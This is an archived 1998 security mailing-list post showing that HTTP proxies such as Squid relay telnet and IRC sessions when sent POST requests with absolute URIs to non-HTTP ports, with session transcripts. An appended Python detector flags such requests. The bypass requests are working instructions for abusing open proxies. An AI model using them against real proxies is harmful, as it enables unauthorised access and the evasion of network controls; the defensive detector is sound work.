Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering

From: Peter van Dijk (peterat_private)
Date: Tue Oct 13 1998 - 14:08:44 PDT


    On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
    > > Date: Thu, 08 Oct 1998 08:27:36 +0100
    > > From:  "Mnemonix" <mnemonixat_private>
    > >
    > > Firstly it seems that most web-based proxies, not just MS Proxy, are
    > > susceptible to this kind of attack. Thanks to Greg Jones and others for
    > > doing some testing on this.
    >
    >  HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
    > pass them straightforward.
    
    Very untrue. Look at this:
    [hardbeat@haarlem hardbeat]$ telnet proxy 8080
    Trying 194.178.232.18...
    Connected to rotterdam.vuurwerk.nl.
    Escape character is '^]'.
    POST http://telnet:23/ HTTP/1.0
    
    
    VuurWerk Internet Telnet Server
    (telnet.vuurwerk.nl)
    
    Alle transacties worden gelogged, het gebruik
    van deze server is alleen voor klanten van
    VuurWerk tbv. het onderhoud van hun eigen site.
    
    POST / HTTP/1.0
    Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
    X-Forwarded-For: 194.178.232.22
    Host: telnet.vuurwerk.nl
    Cache-control: Max-age=259200
    
    login: hardbeat
    Password:
    Last login: Tue Oct 13 22:59:49 from rotterdam
      PID TTY STAT TIME COMMAND
     5896  p6 S    0:00 /bin/login -h p8ur.cistron.nl -p
     5901  p6 S    0:00  \_ -bash
     6175  p6 S    0:00      \_ telnet proxy 8080
     6186  p8 S    0:00 /bin/login -h rotterdam vuurwerk.nl -p
     6190  p8 S    0:00  \_ -bash
     6205  p8 R    0:00      \_ ps xfww
    [hardbeat@haarlem hardbeat]$
    
    
    Haarlem is the shell machine here, also CNAMEd telnet. The proxy (Squid/1.1.21)
    will happily forward me, and telnet works as if there's no proxy in between.
    
    Another great example:
    
    [hardbeat@haarlem hardbeat]$ telnet proxy 8080
    Trying 194.178.232.18...
    Connected to rotterdam.vuurwerk.nl.
    Escape character is '^]'.
    POST http://irc.pi.net:6667/ HTTP/1.0
    
    nick Hardbeat2
    PING :1693634679
    PONG 1693634679
    USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
    :Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
    :Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
    :Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST
    
    I can happily IRC now... imagine how easy it would be to write an IRC bouncer
    that uses a proxy. Lots of proxies have NO ACL or firewall around them.
    
    The only thing I have _not_ succeeded in until now is chaining proxies with
    GET or POST requests.
    
    Greetz, Peter.
    --
    'I guess anybody who walks away from a root shell at :         Peter van Dijk
     a nerd party gets what they deserve!' -- BillSF     :peterat_private
    -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --
    finger peterat_private for my public PGP-key
      -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -
    
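The proxy behaviour shown in the post (a POST with an absolute URI pointing at port 23 or 6667 turning the proxy into a raw TCP relay) is exactly what a destination-port check on the proxy, or on its access log, is there to catch. The following is an added example and not code from the original post: it parses proxy request lines like the two shown and flags any whose destination port lies outside an allowed set. The port sets are an assumed policy in the spirit of a Squid-style Safe_ports/SSL_ports ACL, not any shipped default, and the sample lines are constructed.

```python
"""Flag proxy request lines whose destination port is not an HTTP port.

Added example, not from the original post. Port sets are assumed policy;
SAMPLE_LINES are constructed (the first two mirror the post's requests).
"""
import re
from urllib.parse import urlsplit

SAFE_PORTS = {80, 443, 8080}   # assumed: where GET/POST/... may be forwarded
CONNECT_PORTS = {443}          # assumed: where CONNECT may be forwarded

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d\.\d$")


def parse_request_line(line):
    """Return (method, host, port) for an absolute-URI or CONNECT request line, else None."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    method, target = m.group("method"), m.group("target")
    if method == "CONNECT":
        host, sep, port = target.rpartition(":")   # authority form: host:port
        if not sep or not port.isdigit():
            return None
        return method, host, int(port)
    parts = urlsplit(target)                        # absolute-URI form
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return method, parts.hostname, port


def flag_tunnel_requests(lines, safe_ports=SAFE_PORTS, connect_ports=CONNECT_PORTS):
    """Return (method, host, port) for each request aimed at a disallowed port."""
    flagged = []
    for line in lines:
        parsed = parse_request_line(line)
        if parsed is None:
            continue                                 # not a proxy request line
        method, host, port = parsed
        allowed = connect_ports if method == "CONNECT" else safe_ports
        if port not in allowed:
            flagged.append((method, host, port))
    return flagged


SAMPLE_LINES = [                                     # constructed sample input
    "POST http://telnet:23/ HTTP/1.0",
    "POST http://irc.pi.net:6667/ HTTP/1.0",
    "GET http://www.example.com/ HTTP/1.0",
    "CONNECT mail.example.com:443 HTTP/1.0",
    "CONNECT smtp.example.com:25 HTTP/1.0",
]
```

Running `flag_tunnel_requests(SAMPLE_LINES)` returns the two POST requests from the post and the CONNECT to port 25, while the plain GET and the CONNECT to 443 pass; the same parse can be pointed at the request-line field of a proxy's access log.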



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:19:40 PDT